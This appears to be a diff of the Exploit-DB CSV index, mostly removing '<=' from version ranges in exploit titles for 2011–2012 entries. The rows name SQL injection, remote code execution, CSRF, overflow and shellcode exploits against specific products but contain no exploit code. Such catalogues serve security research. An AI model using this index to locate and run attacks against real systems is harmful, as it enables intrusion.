- 'rmdir' Directory Traversal",2011-12-11,"Stefan Schurtz",windows,remote,0 18236,platforms/php/webapps/18236.txt,"Pixie 1.04 - Blog Post CSRF",2011-12-11,hackme,php,webapps,0 -18239,platforms/php/webapps/18239.rb,"Traq <= 2.3 - Authentication Bypass / Remote Code Execution Exploit (Metasploit)",2011-12-13,Metasploit,php,webapps,0 +18239,platforms/php/webapps/18239.rb,"Traq 2.3 - Authentication Bypass / Remote Code Execution Exploit (Metasploit)",2011-12-13,Metasploit,php,webapps,0 18240,platforms/windows/remote/18240.rb,"CoDeSys SCADA 2.3 - Webserver Stack Buffer Overflow",2011-12-13,Metasploit,windows,remote,0 -18243,platforms/php/webapps/18243.rb,"PmWiki <= 2.2.34 - (pagelist) Remote PHP Code Injection Exploit (2)",2011-12-14,Metasploit,php,webapps,0 +18243,platforms/php/webapps/18243.rb,"PmWiki 2.2.34 - (pagelist) Remote PHP Code Injection Exploit (2)",2011-12-14,Metasploit,php,webapps,0 18246,platforms/php/webapps/18246.txt,"Seotoaster SQL Injection Admin Login Bypass",2011-12-16,"Stefan Schurtz",php,webapps,0 18247,platforms/multiple/webapps/18247.txt,"Capexweb 1.1 - SQL Injection",2011-12-16,"D1rt3 Dud3",multiple,webapps,0 -18248,platforms/php/webapps/18248.pl,"mPDF <= 5.3 File Disclosure",2011-12-16,ZadYree,php,webapps,0 +18248,platforms/php/webapps/18248.pl,"mPDF 5.3 File Disclosure",2011-12-16,ZadYree,php,webapps,0 18249,platforms/php/webapps/18249.txt,"appRain CMF 0.1.5 - Multiple Web Vulnerabilities",2011-12-19,Vulnerability-Lab,php,webapps,0 -18250,platforms/php/webapps/18250.txt,"DotA OpenStats <= 1.3.9 - SQL Injection",2011-12-19,HvM17,php,webapps,0 +18250,platforms/php/webapps/18250.txt,"DotA OpenStats 1.3.9 - SQL Injection",2011-12-19,HvM17,php,webapps,0 18251,platforms/php/webapps/18251.txt,"Joomla Component (com_dshop) SQL Injection",2011-12-19,CoBRa_21,php,webapps,0 18257,platforms/windows/dos/18257.txt,"IrfanView TIFF Image Processing Buffer Overflow",2011-12-20,"Francis Provencher",windows,dos,0 18254,platforms/windows/dos/18254.pl,"Free Mp3 Player 1.0 - Local Denial of Service",2011-12-19,JaMbA,windows,dos,0 @@ -15842,8 +15842,8 @@ id,file,description,date,author,platform,type,port 18261,platforms/php/webapps/18261.txt,"SpamTitan 5.08 - Multiple Vulnerabilities",2011-12-21,Vulnerability-Lab,php,webapps,0 18262,platforms/multiple/webapps/18262.txt,"Plone and Zope Remote Command Execution PoC",2011-12-21,"Nick Miles",multiple,webapps,0 18268,platforms/windows/dos/18268.txt,"FreeSSHd Crash PoC",2011-12-24,Level,windows,dos,0 -18265,platforms/php/webapps/18265.txt,"Tiki Wiki CMS Groupware <= 8.2 - (snarf_ajax.php) Remote PHP Code Injection",2011-12-22,EgiX,php,webapps,0 -18266,platforms/php/webapps/18266.py,"Open Conference/Journal/Harvester Systems <= 2.3.x - Multiple RCE Vulnerabilities",2011-12-23,mr_me,php,webapps,0 +18265,platforms/php/webapps/18265.txt,"Tiki Wiki CMS Groupware 8.2 - (snarf_ajax.php) Remote PHP Code Injection",2011-12-22,EgiX,php,webapps,0 +18266,platforms/php/webapps/18266.py,"Open Conference/Journal/Harvester Systems 2.3.x - Multiple RCE Vulnerabilities",2011-12-23,mr_me,php,webapps,0 18269,platforms/windows/dos/18269.py,"MySQL 5.5.8 - Remote Denial of Service (DOS)",2011-12-24,Level,windows,dos,0 18270,platforms/windows/dos/18270.py,"Putty 0.60 Crash PoC",2011-12-24,Level,windows,dos,0 18271,platforms/windows/dos/18271.py,"Windows Media Player 11.0.5721.5262 - Remote Denial of Service (DOS)",2011-12-24,Level,windows,dos,0 @@ -15866,30 +15866,30 @@ id,file,description,date,author,platform,type,port 18294,platforms/lin_x86/shellcode/18294.c,"Linux/x86 - Polymorphic Shellcode setuid(0) + setgid(0) + add user _iph_ without password to /etc/passwd",2011-12-31,pentesters.ir,lin_x86,shellcode,0 18295,platforms/linux/dos/18295.txt,"lighttpd Denial of Service PoC",2011-12-31,pi3,linux,dos,0 18296,platforms/php/dos/18296.txt,"PHP Hashtables Denial of Service",2012-01-01,infodox,php,dos,0 -18297,platforms/php/webapps/18297.txt,"WSN Links Script 2.3.4 - SQL Injection Vulnerabilitiy",2012-01-02,"H4ckCity Security Team",php,webapps,0 -18298,platforms/php/webapps/18298.txt,"Php-X-Links Script SQL Injection Vulnerabilitiy",2012-01-02,"H4ckCity Security Team",php,webapps,0 +18297,platforms/php/webapps/18297.txt,"WSN Links Script 2.3.4 - SQL Injection",2012-01-02,"H4ckCity Security Team",php,webapps,0 +18298,platforms/php/webapps/18298.txt,"Php-X-Links Script - SQL Injection",2012-01-02,"H4ckCity Security Team",php,webapps,0 18300,platforms/php/webapps/18300.txt,"MyPHPDating 1.0 - SQL Injection",2012-01-02,ITTIHACK,php,webapps,0 -18982,platforms/windows/webapps/18982.txt,"Hexamail Server <= 4.4.5 Persistent XSS",2012-06-04,modpr0be,windows,webapps,0 +18982,platforms/windows/webapps/18982.txt,"Hexamail Server 4.4.5 Persistent XSS",2012-06-04,modpr0be,windows,webapps,0 19024,platforms/windows/dos/19024.pl,"ComSndFTP Server 1.3.7 Beta Remote Format String Overflow",2012-06-08,demonalex,windows,dos,0 18305,platforms/php/dos/18305.py,"PHP Hash Table Collision Proof Of Concept",2012-01-03,"Christian Mehlmauer",php,dos,0 18308,platforms/php/webapps/18308.txt,"Typo3 4.5-4.7 - Remote Code Execution (RFI/LFI)",2012-01-04,MaXe,php,webapps,0 18309,platforms/windows/dos/18309.pl,"VLC Media Player 1.1.11 - (.amr) Denial of Service PoC",2012-01-04,Fabi@habsec,windows,dos,0 -18314,platforms/php/webapps/18314.txt,"Posse Softball Director CMS SQL Injection Vulnerabilitiy",2012-01-04,"H4ckCity Security Team",php,webapps,0 -18983,platforms/php/webapps/18983.php,"Mnews <= 1.1 - (view.php) SQL Injection",2012-06-04,WhiteCollarGroup,php,webapps,0 -18984,platforms/multiple/remote/18984.rb,"Apache Struts <= 2.2.1.1 - Remote Command Execution",2012-06-05,Metasploit,multiple,remote,0 +18314,platforms/php/webapps/18314.txt,"Posse Softball Director CMS - SQL Injection",2012-01-04,"H4ckCity Security Team",php,webapps,0 +18983,platforms/php/webapps/18983.php,"Mnews 1.1 - (view.php) SQL Injection",2012-06-04,WhiteCollarGroup,php,webapps,0 +18984,platforms/multiple/remote/18984.rb,"Apache Struts 2.2.1.1 - Remote Command Execution",2012-06-05,Metasploit,multiple,remote,0 18318,platforms/windows/dos/18318.py,"Netcut 2.0 - Denial of Service",2012-01-04,MaYaSeVeN,windows,dos,0 18977,platforms/php/dos/18977.php,"PHP 5.3.10 - spl_autoload_register() Local Denial of Service",2012-06-03,"Yakir Wizman",php,dos,0 18978,platforms/php/dos/18978.php,"PHP 5.3.10 - spl_autoload_call() Local Denial of Service",2012-06-03,"Yakir Wizman",php,dos,0 18979,platforms/php/webapps/18979.txt,"vanilla forums poll plugin 0.9 - Stored XSS",2012-06-03,"Henry Hoggard",php,webapps,0 18980,platforms/php/webapps/18980.txt,"Vanilla Forums 2.0.18.4 Tagging Stored XSS",2012-06-03,"Henry Hoggard",php,webapps,0 18320,platforms/php/webapps/18320.txt,"Posse Softball Director CMS (team.php) Blind SQL Injection",2012-01-04,"Easy Laster",php,webapps,0 -19381,platforms/php/webapps/19381.php,"SugarCRM CE <= 6.3.1 - 'unserialize()' PHP Code Execution",2012-06-23,EgiX,php,webapps,0 +19381,platforms/php/webapps/19381.php,"SugarCRM CE 6.3.1 - 'unserialize()' PHP Code Execution",2012-06-23,EgiX,php,webapps,0 18322,platforms/php/webapps/18322.txt,"TinyWebGallery 1.8.3 - Remote Command Execution",2012-01-06,Expl0!Ts,php,webapps,0 18985,platforms/php/webapps/18985.txt,"pyrocms 2.1.1 - Multiple Vulnerabilities",2012-06-05,LiquidWorm,php,webapps,0 18327,platforms/netware/dos/18327.txt,"Novell Netware XNFS.NLM NFS Rename Remote Code Execution",2012-01-06,"Francis Provencher",netware,dos,0 18328,platforms/netware/dos/18328.txt,"Novell Netware XNFS.NLM STAT Notify Remote Code Execution",2012-01-06,"Francis Provencher",netware,dos,0 18329,platforms/multiple/webapps/18329.txt,"Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities",2012-01-06,"SEC Consult",multiple,webapps,0 -18330,platforms/php/webapps/18330.txt,"WordPress Plugin pay with tweet <= 1.1 - Multiple Vulnerabilities",2012-01-06,"Gianluca Brindisi",php,webapps,0 +18330,platforms/php/webapps/18330.txt,"WordPress Plugin pay with tweet 1.1 - Multiple Vulnerabilities",2012-01-06,"Gianluca Brindisi",php,webapps,0 18334,platforms/windows/local/18334.py,"Microsoft Office 2003 Home/Pro - Code Execution (0Day)",2012-01-08,"b33f & g11tch",windows,local,0 18335,platforms/php/webapps/18335.txt,"MangosWeb SQL Injection",2012-01-08,Hood3dRob1n,php,webapps,0 18336,platforms/hardware/dos/18336.pl,"AirTies-4450 Unauthorized Remote Reboot",2012-01-08,rigan,hardware,dos,0 @@ -15905,7 +15905,7 @@ id,file,description,date,author,platform,type,port 18347,platforms/php/webapps/18347.txt,"Pragyan CMS 3.0 - Remote File Disclosure",2012-01-10,Or4nG.M4N,php,webapps,0 18348,platforms/php/webapps/18348.txt,"w-cms 2.01 - Multiple Vulnerabilities",2012-01-10,th3.g4m3_0v3r,php,webapps,0 18349,platforms/windows/local/18349.pl,"Blade API Monitor 3.6.9.2 Unicode Stack Buffer Overflow",2012-01-10,FullMetalFouad,windows,local,0 -18350,platforms/php/webapps/18350.txt,"WordPress Age Verification Plugin <= 0.4 - Open Redirect",2012-01-10,"Gianluca Brindisi",php,webapps,0 +18350,platforms/php/webapps/18350.txt,"WordPress Age Verification Plugin 0.4 - Open Redirect",2012-01-10,"Gianluca Brindisi",php,webapps,0 18351,platforms/netware/dos/18351.txt,"Novell Netware XNFS caller_name xdrDecodeString Remote Code Execution",2012-01-10,"Francis Provencher",netware,dos,0 18352,platforms/php/webapps/18352.txt,"YABSoft Advanced Image Hosting Script SQL Injection",2012-01-12,"Robert Cooper",php,webapps,0 18353,platforms/php/webapps/18353.txt,"WordPress wp-autoyoutube plugin - Blind SQL Injection",2012-01-12,longrifle0x,php,webapps,0 @@ -15939,14 +15939,14 @@ id,file,description,date,author,platform,type,port 18386,platforms/php/webapps/18386.txt,"DZCP (deV!L_z Clanportal) 1.5.5 Moviebase Addon - Blind SQL Injection",2012-01-18,"Easy Laster",php,webapps,0 18388,platforms/windows/remote/18388.rb,"HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow",2012-01-20,Metasploit,windows,remote,0 18389,platforms/php/webapps/18389.txt,"Drupal CKEditor 3.0 < 3.6.2 - Persistent EventHandler XSS",2012-01-19,MaXe,php,webapps,0 -18390,platforms/php/webapps/18390.txt,"WordPress Plugin ucan post <= 1.0.09 - Stored XSS",2012-01-19,"Gianluca Brindisi",php,webapps,0 +18390,platforms/php/webapps/18390.txt,"WordPress Plugin ucan post 1.0.09 - Stored XSS",2012-01-19,"Gianluca Brindisi",php,webapps,0 18700,platforms/php/webapps/18700.txt,"e-ticketing - SQL Injection",2012-04-04,"Mark Stanislav",php,webapps,0 -18392,platforms/php/webapps/18392.php,"appRain CMF <= 0.1.5 - (uploadify.php) Unrestricted File Upload Exploit",2012-01-19,EgiX,php,webapps,0 +18392,platforms/php/webapps/18392.php,"appRain CMF 0.1.5 - (uploadify.php) Unrestricted File Upload Exploit",2012-01-19,EgiX,php,webapps,0 18393,platforms/linux/remote/18393.rb,"Gitorious Arbitrary Command Execution",2012-01-20,Metasploit,linux,remote,0 18394,platforms/asp/webapps/18394.txt,"ICTimeAttendance Authentication Bypass",2012-01-20,v3n0m,asp,webapps,0 18395,platforms/asp/webapps/18395.txt,"EasyPage SQL Injection",2012-01-20,"Red Security TEAM",asp,webapps,0 18396,platforms/php/webapps/18396.sh,"WhatsApp Status Changer 0.2 - Exploit",2012-01-20,emgent,php,webapps,0 -18397,platforms/windows/remote/18397.py,"Avaya WinPDM UniteHostRouter <= 3.8.2 - Remote Pre-Auth Command Execute",2012-01-20,Abysssec,windows,remote,0 +18397,platforms/windows/remote/18397.py,"Avaya WinPDM UniteHostRouter 3.8.2 - Remote Pre-Auth Command Execute",2012-01-20,Abysssec,windows,remote,0 18401,platforms/windows/remote/18401.py,"Savant Web Server 3.1 - Buffer Overflow Exploit (Egghunter)",2012-01-21,red-dragon,windows,remote,0 18402,platforms/php/webapps/18402.pl,"PHP iReport 1.0 - Remote Html Code injection",2012-01-21,Or4nG.M4N,php,webapps,0 18403,platforms/php/webapps/18403.txt,"Nova CMS Directory Traversal",2012-01-21,"Red Security TEAM",php,webapps,0 @@ -15957,27 +15957,27 @@ id,file,description,date,author,platform,type,port 18407,platforms/php/webapps/18407.txt,"AllWebMenus < 1.1.9 WordPress Menu Plugin - Arbitrary File Upload",2012-01-22,6Scan,php,webapps,0 18410,platforms/php/webapps/18410.txt,"miniCMS 1.0 & 2.0 - PHP Code Inject",2012-01-22,Or4nG.M4N,php,webapps,0 18698,platforms/windows/dos/18698.py,"Xion Audio Player 1.0.127 - (.aiff) Denial of Service",2012-04-04,condis,windows,dos,0 -18699,platforms/php/webapps/18699.txt,"PlumeCMS <= 1.2.4 - Multiple Persistent XSS",2012-04-04,"Ivano Binetti",php,webapps,0 +18699,platforms/php/webapps/18699.txt,"PlumeCMS 1.2.4 - Multiple Persistent XSS",2012-04-04,"Ivano Binetti",php,webapps,0 18697,platforms/windows/remote/18697.rb,"NetOp Remote Control Client 9.5 - Buffer Overflow",2012-04-04,Metasploit,windows,remote,0 18413,platforms/php/webapps/18413.txt,"SpamTitan Application 5.08x - SQL Injection",2012-01-23,Vulnerability-Lab,php,webapps,0 18701,platforms/php/webapps/18701.txt,"phpPaleo - Local File Inclusion",2012-04-04,"Mark Stanislav",php,webapps,0 18416,platforms/jsp/webapps/18416.txt,"stoneware webnetwork6 - Multiple Vulnerabilities",2012-01-24,"Jacob Holcomb",jsp,webapps,0 -18417,platforms/php/webapps/18417.txt,"WordPress <= 3.3.1 - Multiple Vulnerabilities",2012-01-25,"Trustwave's SpiderLabs",php,webapps,0 +18417,platforms/php/webapps/18417.txt,"WordPress 3.3.1 - Multiple Vulnerabilities",2012-01-25,"Trustwave's SpiderLabs",php,webapps,0 18418,platforms/php/webapps/18418.html,"VR GPub 4.0 - CSRF",2012-01-26,Cyber-Crystal,php,webapps,0 18419,platforms/php/webapps/18419.html,"phplist 2.10.9 - CSRF/XSS",2012-01-26,Cyber-Crystal,php,webapps,0 18420,platforms/windows/remote/18420.rb,"Sysax Multi Server 5.50 - Create Folder Remote Code Execution BoF (Metasploit)",2012-01-26,"Craig Freyman",windows,remote,0 18422,platforms/php/webapps/18422.txt,"Peel SHOPPING 2.8& 2.9 - XSS/SQL Injections",2012-01-26,Cyber-Crystal,php,webapps,0 18423,platforms/windows/remote/18423.rb,"HP Diagnostics Server magentservice.exe Overflow",2012-01-27,Metasploit,windows,remote,0 -18424,platforms/php/webapps/18424.rb,"vBSEO <= 3.6.0 - 'proc_deutf()' Remote PHP Code Injection Exploit (Metasploit)",2012-01-27,EgiX,php,webapps,0 +18424,platforms/php/webapps/18424.rb,"vBSEO 3.6.0 - 'proc_deutf()' Remote PHP Code Injection Exploit (Metasploit)",2012-01-27,EgiX,php,webapps,0 18426,platforms/windows/remote/18426.rb,"Windows - midiOutPlayNextPolyEvent Heap Overflow (MS12-004)",2012-01-28,Metasploit,windows,remote,0 18427,platforms/windows/dos/18427.txt,"Tracker Software pdfSaver ActiveX 3.60 - (pdfxctrl.dll) Stack Buffer Overflow (SEH)",2012-01-29,LiquidWorm,windows,dos,0 18429,platforms/php/webapps/18429.pl,"4Images 1.7.6-9 - CSRF Inject PHP Code",2012-01-30,Or4nG.M4N,php,webapps,0 -18430,platforms/multiple/webapps/18430.txt,"Campaign Enterprise 11.0.421 SQLi",2012-01-30,"Craig Freyman",multiple,webapps,0 +18430,platforms/multiple/webapps/18430.txt,"Campaign Enterprise 11.0.421 - SQLi",2012-01-30,"Craig Freyman",multiple,webapps,0 18431,platforms/multiple/webapps/18431.txt,"Ajax Upload Arbitrary File Upload",2012-01-30,"Daniel Godoy",multiple,webapps,0 18432,platforms/php/webapps/18432.txt,"phux Download Manager Blind SQL Injection",2012-01-30,"Red Security TEAM",php,webapps,0 18435,platforms/php/webapps/18435.txt,"phpShowtime Directory Traversal",2012-01-31,"Red Security TEAM",php,webapps,0 18436,platforms/linux/dos/18436.txt,"sudo 1.8.0 - 1.8.3p1 Format String",2012-01-31,joernchen,linux,dos,0 -18434,platforms/php/webapps/18434.txt,"Snort Report <= 1.3.2 - SQL Injection",2012-01-31,"a.kadir altan",php,webapps,0 +18434,platforms/php/webapps/18434.txt,"Snort Report 1.3.2 - SQL Injection",2012-01-31,"a.kadir altan",php,webapps,0 18437,platforms/windows/remote/18437.txt,"Adobe Flash Player - MP4 SequenceParameterSetNALUnit Remote Code Execution Exploit",2012-01-31,Abysssec,windows,remote,0 18438,platforms/php/webapps/18438.txt,"Ez Album Blind SQL Injection",2012-01-31,"Red Security TEAM",php,webapps,0 18439,platforms/php/webapps/18439.txt,"PragmaMX 1.2.10 Persistent XSS",2012-01-31,HauntIT,php,webapps,0 @@ -16001,17 +16001,17 @@ id,file,description,date,author,platform,type,port 18460,platforms/php/dos/18460.php,"PHP 5.4.0RC6 (64-bit) - Denial of Service",2012-02-04,"Stefan Esser",php,dos,0 18461,platforms/windows/dos/18461.html,"Edraw Diagram Component 5 - ActiveX Buffer Overflow DoS",2012-02-04,"Senator of Pirates",windows,dos,0 18463,platforms/windows/dos/18463.html,"PDF Viewer Component ActiveX DoS",2012-02-05,"Senator of Pirates",windows,dos,0 -18464,platforms/php/webapps/18464.html,"GAzie <= 5.20 - Cross-Site Request Forgery",2012-02-05,"Giuseppe D'Inverno",php,webapps,0 +18464,platforms/php/webapps/18464.html,"GAzie 5.20 - Cross-Site Request Forgery",2012-02-05,"Giuseppe D'Inverno",php,webapps,0 18465,platforms/php/webapps/18465.txt,"BASE 1.4.5 - (base_qry_main.php t_view) SQL Injection",2012-02-06,"a.kadir altan",php,webapps,0 18466,platforms/php/webapps/18466.txt,"Tube Ace(Adult PHP Tube Script) SQL Injection",2012-02-06,"Daniel Godoy",php,webapps,0 18467,platforms/php/webapps/18467.txt,"XRayCMS 1.1.1 - SQL Injection",2012-02-06,chap0,php,webapps,0 18468,platforms/php/webapps/18468.html,"Flyspray 0.9.9.6 - CSRF",2012-02-07,"Vaibhav Gupta",php,webapps,0 18469,platforms/windows/dos/18469.pl,"Typsoft FTP Server 1.10 - Multiple Commands DoS",2012-02-07,"Balazs Makany",windows,dos,0 18470,platforms/php/webapps/18470.txt,"Ananta Gazelle CMS - Update Statement SQL Injection",2012-02-08,hackme,php,webapps,0 -18471,platforms/windows/local/18471.c,"TORCS <= 1.3.2 xml Buffer Overflow /SAFESEH evasion",2012-02-08,"Andres Gomez and David Mora",windows,local,0 +18471,platforms/windows/local/18471.c,"TORCS 1.3.2 xml Buffer Overflow /SAFESEH evasion",2012-02-08,"Andres Gomez and David Mora",windows,local,0 18473,platforms/multiple/webapps/18473.txt,"Cyberoam Central Console 2.00.2 - File Include",2012-02-08,Vulnerability-Lab,multiple,webapps,0 18475,platforms/windows/dos/18475.c,"PeerBlock 1.1 BSOD",2012-02-09,shinnai,windows,dos,0 -18476,platforms/windows/remote/18476.py,"Sysax Multi Server <= 5.52 - File Rename BoF RCE (Egghunter)",2012-02-09,"Craig Freyman",windows,remote,0 +18476,platforms/windows/remote/18476.py,"Sysax Multi Server 5.52 - File Rename BoF RCE (Egghunter)",2012-02-09,"Craig Freyman",windows,remote,0 18478,platforms/windows/remote/18478.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020000 Buffer Overflow",2012-02-10,Metasploit,windows,remote,0 18479,platforms/windows/remote/18479.rb,"Adobe Flash Player - MP4 SequenceParameterSetNALUnit Buffer Overflow",2012-02-10,Metasploit,windows,remote,0 18480,platforms/php/webapps/18480.txt,"Dolibarr CMS 3.2.0 < Alpha - File Include Vulnerabilities",2012-02-10,Vulnerability-Lab,php,webapps,0 @@ -16020,50 +16020,50 @@ id,file,description,date,author,platform,type,port 18499,platforms/hardware/webapps/18499.txt,"D-Link DSL-2640B (ADSL Router) CSRF",2012-02-20,"Ivano Binetti",hardware,webapps,0 18485,platforms/windows/remote/18485.rb,"Java MixerSequencer Object GM_Song Structure Handling",2012-02-16,Metasploit,windows,remote,0 18487,platforms/php/webapps/18487.html,"SocialCMS 1.0.2 - CSRF",2012-02-16,"Ivano Binetti",php,webapps,0 -18488,platforms/windows/dos/18488.txt,"Novell GroupWise Messenger <= 2.1.0 - Arbitrary Memory Corruption",2012-02-16,"Luigi Auriemma",windows,dos,8300 -18489,platforms/windows/dos/18489.txt,"Novell GroupWise Messenger <= 2.1.0 Memory Corruption",2012-02-16,"Luigi Auriemma",windows,dos,8300 -18490,platforms/windows/dos/18490.txt,"Novell GroupWise Messenger Client <= 2.1.0 Unicode Stack Overflow",2012-02-16,"Luigi Auriemma",windows,dos,0 -18491,platforms/windows/dos/18491.txt,"xnview <= 1.98.5 - Multiple Vulnerabilities",2012-02-16,"Luigi Auriemma",windows,dos,0 +18488,platforms/windows/dos/18488.txt,"Novell GroupWise Messenger 2.1.0 - Arbitrary Memory Corruption",2012-02-16,"Luigi Auriemma",windows,dos,8300 +18489,platforms/windows/dos/18489.txt,"Novell GroupWise Messenger 2.1.0 Memory Corruption",2012-02-16,"Luigi Auriemma",windows,dos,8300 +18490,platforms/windows/dos/18490.txt,"Novell GroupWise Messenger Client 2.1.0 Unicode Stack Overflow",2012-02-16,"Luigi Auriemma",windows,dos,0 +18491,platforms/windows/dos/18491.txt,"xnview 1.98.5 - Multiple Vulnerabilities",2012-02-16,"Luigi Auriemma",windows,dos,0 18492,platforms/linux/remote/18492.rb,"Horde 3.3.12 Backdoor Arbitrary PHP Code Execution",2012-02-17,Metasploit,linux,remote,0 18493,platforms/windows/dos/18493.py,"PCAnywhere 12.5.0 build 463 - Denial of Service",2012-02-17,"Johnathan Norman",windows,dos,0 -18494,platforms/php/webapps/18494.txt,"Pandora Fms 4.0.1 - Local File Include",2012-02-17,Vulnerability-Lab,php,webapps,0 +18494,platforms/php/webapps/18494.txt,"Pandora Fms 4.0.1 - Local File Inclusion",2012-02-17,Vulnerability-Lab,php,webapps,0 18495,platforms/php/webapps/18495.html,"almnzm 2.4 - CSRF (Add Admin)",2012-02-18,"HaNniBaL KsA",php,webapps,0 18497,platforms/php/webapps/18497.txt,"4PSA CMS - SQL Injection Vulnerabilities",2012-02-19,"BHG Security Center",php,webapps,0 -18498,platforms/php/webapps/18498.html,"SyndeoCMS <= 3.0 - CSRF",2012-02-19,"Ivano Binetti",php,webapps,0 +18498,platforms/php/webapps/18498.html,"SyndeoCMS 3.0 - CSRF",2012-02-19,"Ivano Binetti",php,webapps,0 18500,platforms/windows/local/18500.py,"Blade API Monitor Unicode Bypass (Serial Number BOF)",2012-02-20,b33f,windows,local,0 18501,platforms/windows/local/18501.rb,"DJ Studio Pro 5.1.6.5.2 - SEH Exploit (Metasploit)",2012-02-20,Death-Shadow-Dark,windows,local,0 -18502,platforms/php/webapps/18502.html,"PlumeCMS <= 1.2.4 - CSRF",2012-02-20,"Ivano Binetti",php,webapps,0 +18502,platforms/php/webapps/18502.html,"PlumeCMS 1.2.4 - CSRF",2012-02-20,"Ivano Binetti",php,webapps,0 18503,platforms/hardware/webapps/18503.txt,"Cisco Linksys WAG54GS CSRF Change Admin Password",2012-02-21,"Ivano Binetti",hardware,webapps,0 18504,platforms/hardware/webapps/18504.txt,"Sagem F@ST 2604 - CSRF (ADSL Router)",2012-02-22,"KinG Of PiraTeS",hardware,webapps,0 -18561,platforms/php/webapps/18561.txt,"lizard cart SQLi (search.php)",2012-03-05,"Number 7",php,webapps,0 +18561,platforms/php/webapps/18561.txt,"lizard cart - (search.php) SQLi",2012-03-05,"Number 7",php,webapps,0 18563,platforms/php/webapps/18563.txt,"ForkCMS 3.2.5 - Multiple Vulnerabilities",2012-02-21,"Ivano Binetti",php,webapps,0 18506,platforms/php/webapps/18506.txt,"BRIM < 2.0.0 - SQL Injection",2012-02-22,ifnull,php,webapps,0 18520,platforms/windows/remote/18520.rb,"Sun Java Web Start Plugin Command Line Argument Injection (2012)",2012-02-24,Metasploit,windows,remote,0 18507,platforms/windows/dos/18507.py,"DAMN Hash Calculator 1.5.1 - Local Heap Overflow PoC",2012-02-22,"Julien Ahrens",windows,dos,0 18508,platforms/php/webapps/18508.txt,"Limesurvey (PHPSurveyor 1.91+ stable) Blind SQL Injection",2012-02-22,TorTukiTu,php,webapps,0 -18513,platforms/php/webapps/18513.txt,"DFLabs PTK <= 1.0.5 - (Steal Authentication Credentials) Multiple Vulnerabilities",2012-02-22,"Ivano Binetti",php,webapps,0 +18513,platforms/php/webapps/18513.txt,"DFLabs PTK 1.0.5 - (Steal Authentication Credentials) Multiple Vulnerabilities",2012-02-22,"Ivano Binetti",php,webapps,0 18509,platforms/hardware/webapps/18509.html,"Dlink DCS series CSRF Change Admin Password",2012-02-22,rigan,hardware,webapps,0 18510,platforms/windows/webapps/18510.txt,"webcamxp and webcam 7 - Directory Traversal",2012-02-22,Silent_Dream,windows,webapps,0 18511,platforms/hardware/webapps/18511.txt,"D-Link DSL-2640B Authentication Bypass",2012-02-22,"Ivano Binetti",hardware,webapps,0 -18512,platforms/windows/dos/18512.txt,"Unity 3D Web Player <= 3.2.0.61061 - Denial of Service",2012-02-22,"Luigi Auriemma",windows,dos,0 -18514,platforms/windows/remote/18514.rb,"TrendMicro Control Manger <= 5.5 CmdProcessor.exe - Stack Buffer Overflow",2012-02-23,Metasploit,windows,remote,0 +18512,platforms/windows/dos/18512.txt,"Unity 3D Web Player 3.2.0.61061 - Denial of Service",2012-02-22,"Luigi Auriemma",windows,dos,0 +18514,platforms/windows/remote/18514.rb,"TrendMicro Control Manger 5.5 CmdProcessor.exe - Stack Buffer Overflow",2012-02-23,Metasploit,windows,remote,0 18515,platforms/windows/local/18515.rb,"Orbit Downloader - URL Unicode Conversion Overflow",2012-02-23,Metasploit,windows,local,0 -18516,platforms/php/webapps/18516.txt,"phpDenora <= 1.4.6 - Multiple SQL Injection Vulnerabilities",2012-02-23,NLSecurity,php,webapps,0 +18516,platforms/php/webapps/18516.txt,"phpDenora 1.4.6 - Multiple SQL Injection Vulnerabilities",2012-02-23,NLSecurity,php,webapps,0 18517,platforms/hardware/webapps/18517.txt,"Snom IP Phone - Privilege Escalation",2012-02-23,"Sense of Security",hardware,webapps,0 18519,platforms/php/webapps/18519.txt,"PHP Gift Registry 1.5.5 - SQL Injection",2012-02-24,G13,php,webapps,0 18518,platforms/php/webapps/18518.rb,"The Uploader 2.0.4 - (Eng/Ita) Remote File Upload Remote Code Execution (Metasploit)",2012-02-23,"Danny Moules",php,webapps,0 18521,platforms/windows/remote/18521.rb,"HP Data Protector 6.1 EXEC_CMD Remote Code Execution",2012-02-25,Metasploit,windows,remote,0 18522,platforms/php/webapps/18522.php,"cPassMan 1.82 - Remote Command Execution Exploit",2012-02-25,ls,php,webapps,0 18523,platforms/php/webapps/18523.txt,"webgrind 1.0 - (file param) Local File Inclusion",2012-02-25,LiquidWorm,php,webapps,0 -18524,platforms/windows/dos/18524.py,"Tiny HTTP Server <= 1.1.9 - Remote Crash PoC",2012-02-25,localh0t,windows,dos,0 +18524,platforms/windows/dos/18524.py,"Tiny HTTP Server 1.1.9 - Remote Crash PoC",2012-02-25,localh0t,windows,dos,0 18526,platforms/php/webapps/18526.php,"YVS Image Gallery SQL Injection",2012-02-25,CorryL,php,webapps,0 18527,platforms/php/webapps/18527.txt,"ContaoCMS (aka TYPOlight) <= 2.11 - CSRF (Delete Admin & Delete Article)",2012-02-26,"Ivano Binetti",php,webapps,0 18547,platforms/windows/local/18547.rb,"DJ Studio Pro 5.1 - (.pls) Stack Buffer Overflow",2012-03-02,Metasploit,windows,local,0 18531,platforms/windows/remote/18531.html,"Mozilla Firefox 4.0.1 - Array.reduceRight() Exploit",2012-02-27,pa_kt,windows,remote,0 18533,platforms/windows/local/18533.txt,"Socusoft Photo 2 Video 8.05 - Buffer Overflow",2012-02-27,Vulnerability-Lab,windows,local,0 18534,platforms/windows/remote/18534.py,"Sysax Multi Server 5.53 - SFTP Post Auth SEH Exploit",2012-02-27,"Craig Freyman",windows,remote,0 -18535,platforms/windows/remote/18535.py,"Sysax <= 5.53 - SSH Username BoF Pre Auth RCE (Egghunter)",2012-02-27,"Craig Freyman",windows,remote,0 -18536,platforms/php/webapps/18536.txt,"WebfolioCMS <= 1.1.4 - CSRF (Add Admin/Modify Pages)",2012-02-28,"Ivano Binetti",php,webapps,0 +18535,platforms/windows/remote/18535.py,"Sysax 5.53 - SSH Username BoF Pre Auth RCE (Egghunter)",2012-02-27,"Craig Freyman",windows,remote,0 +18536,platforms/php/webapps/18536.txt,"WebfolioCMS 1.1.4 - CSRF (Add Admin/Modify Pages)",2012-02-28,"Ivano Binetti",php,webapps,0 18702,platforms/php/webapps/18702.txt,"Hotel Booking Portal - SQL Injection",2012-04-04,"Mark Stanislav",php,webapps,0 18538,platforms/windows/remote/18538.rb,"ASUS Net4Switch - ipswcom.dll ActiveX Stack Buffer Overflow",2012-02-29,Metasploit,windows,remote,0 18539,platforms/windows/remote/18539.rb,"IBM Personal Communications I-Series Access WorkStation 5.9 Profile",2012-02-29,Metasploit,windows,remote,0 @@ -16080,7 